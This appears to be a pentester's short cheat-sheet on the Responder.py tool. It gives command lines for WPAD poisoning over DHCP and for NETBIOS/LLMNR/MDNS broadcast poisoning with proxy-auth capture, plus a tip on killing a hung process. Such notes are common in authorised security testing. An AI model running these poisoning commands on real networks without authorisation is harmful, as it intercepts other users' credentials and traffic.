Skip to main content

Responder.py

Responder is awesome at tricking systems into talking to other systems.

Poisoning WPAD over DHCP

responder.py -dPv -I eth0
  • -d for DHCP
  • -P for ProxyAuth
  • -v for verbose

Basic poisoning of NETBIOS/LLMNR/MDNS broadcasts

responder.py -i my.local.kali.ip -I eth0 -Pv

Killing a non-responding Responder

If your Responder ever stops...you know...Responder-ing, find the process running Python:

ps aux | grep python

You'll see a line that looks something like this:

root       29125  1.6  0.0  17772  6784 pts/1    S+   21:05   0:01 sudo python3 /opt/responder/Responder.py -I eth0 -Pv

The number next to root is the PID, and that's what you need to kill like so:

kill 29125

One of the reasons you might need to do this is because of this "spam" issue I raised on GitHub.